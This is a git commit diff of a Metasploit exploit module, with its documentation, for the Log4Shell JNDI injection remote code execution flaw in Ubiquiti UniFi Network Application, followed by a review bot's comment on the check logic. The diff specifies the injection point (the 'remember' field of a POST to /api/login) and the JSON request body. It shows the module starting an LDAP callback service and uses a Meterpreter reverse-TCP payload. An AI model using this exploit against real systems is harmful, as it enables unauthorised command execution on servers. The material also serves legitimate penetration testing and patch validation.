Add details to check codes and PR feedback
parent
579627f5c7
commit
458d584f83
|
@ -2,8 +2,9 @@
|
||||||
|
|
||||||
### Description
|
### Description
|
||||||
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
||||||
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
|
vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
|
||||||
deserialize a malicious Java object. This results in OS command execution.
|
/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
|
||||||
|
object. This results in OS command execution in the context of the server application.
|
||||||
|
|
||||||
This module will start an LDAP server that the target will need to connect to.
|
This module will start an LDAP server that the target will need to connect to.
|
||||||
|
|
||||||
|
@ -33,7 +34,6 @@ Older versions of the UniFi Network Application can be downloaded from [communit
|
||||||
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
|
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
|
||||||
vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
|
vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.
|
||||||
|
|
||||||
|
|
||||||
```
|
```
|
||||||
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
|
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
|
||||||
[*] Using configured payload windows/meterpreter/reverse_tcp
|
[*] Using configured payload windows/meterpreter/reverse_tcp
|
||||||
|
|
|
@ -14,8 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
|
'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
|
||||||
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
|
vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the
|
||||||
deserialize a malicious Java object. This results in OS command execution.
|
/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java
|
||||||
|
object. This results in OS command execution in the context of the server application.
|
||||||
|
|
||||||
This module will start an LDAP server that the target will need to connect to.
|
This module will start an LDAP server that the target will need to connect to.
|
||||||
},
|
},
|
||||||
|
@ -77,10 +78,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def check
|
def check
|
||||||
validate_configuration!
|
validate_configuration!
|
||||||
res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
|
res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))
|
||||||
return Exploit::CheckCode::Unknown if res.nil?
|
return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
|
||||||
|
|
||||||
server_version = res.get_json_document.dig('meta', 'server_version')
|
server_version = res.get_json_document.dig('meta', 'server_version')
|
||||||
return Exploit::CheckCode::Safe unless server_version =~ /(\d+\.)+/
|
return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/
|
||||||
|
|
||||||
vprint_status("Detected version: #{server_version}")
|
vprint_status("Detected version: #{server_version}")
|
||||||
server_version = Rex::Version.new(server_version)
|
server_version = Rex::Version.new(server_version)
|
||||||
|
@ -93,12 +94,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
|
vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
|
||||||
|
|
||||||
start_service
|
start_service
|
||||||
trigger
|
res = trigger
|
||||||
|
return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
|
||||||
|
|
||||||
wait_until { @search_received }
|
wait_until { @search_received }
|
||||||
return Exploit::CheckCode::Unknown unless @search_received
|
@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
|
||||||
|
|
||||||
Exploit::CheckCode::Vulnerable
|
|
||||||
ensure
|
ensure
|
||||||
stop_service
|
stop_service
|
||||||
end
|
end
|
||||||
|
@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'ctype' => 'application/json',
|
'ctype' => 'application/json',
|
||||||
'data' => {
|
'data' => {
|
||||||
'username' => jndi_string,
|
'username' => rand_text_alphanumeric(8..16), # can not be blank!,
|
||||||
'password' => rand_text_alphanumeric(8..16), # can not be blank!
|
'password' => rand_text_alphanumeric(8..16), # can not be blank!
|
||||||
'remember' => jndi_string,
|
'remember' => jndi_string,
|
||||||
'strict' => true
|
'strict' => true
|
||||||
|
|
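Review bot: In the `check` hunk at `@ -93,12 +94,11`, the new `return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?` runs before `wait_until { @search_received }`, so a login request that times out is reported as Unknown even if the LDAP search did arrive. A JNDI lookup that blocks the request thread could plausibly produce exactly that combination, and the check would then under-report a vulnerable host to someone validating exposure or a patch. Consider waiting first and letting the callback decide: put `return Exploit::CheckCode::Vulnerable if @search_received` right after `wait_until`, then pick between the two Unknown messages based on `res.nil?`. The body of `check` begins in the previous hunk, so this assumes nothing between the hunks resets `@search_received`. Separately, the comment on the new `'username'` line reads `# can not be blank!,` with a stray trailing comma.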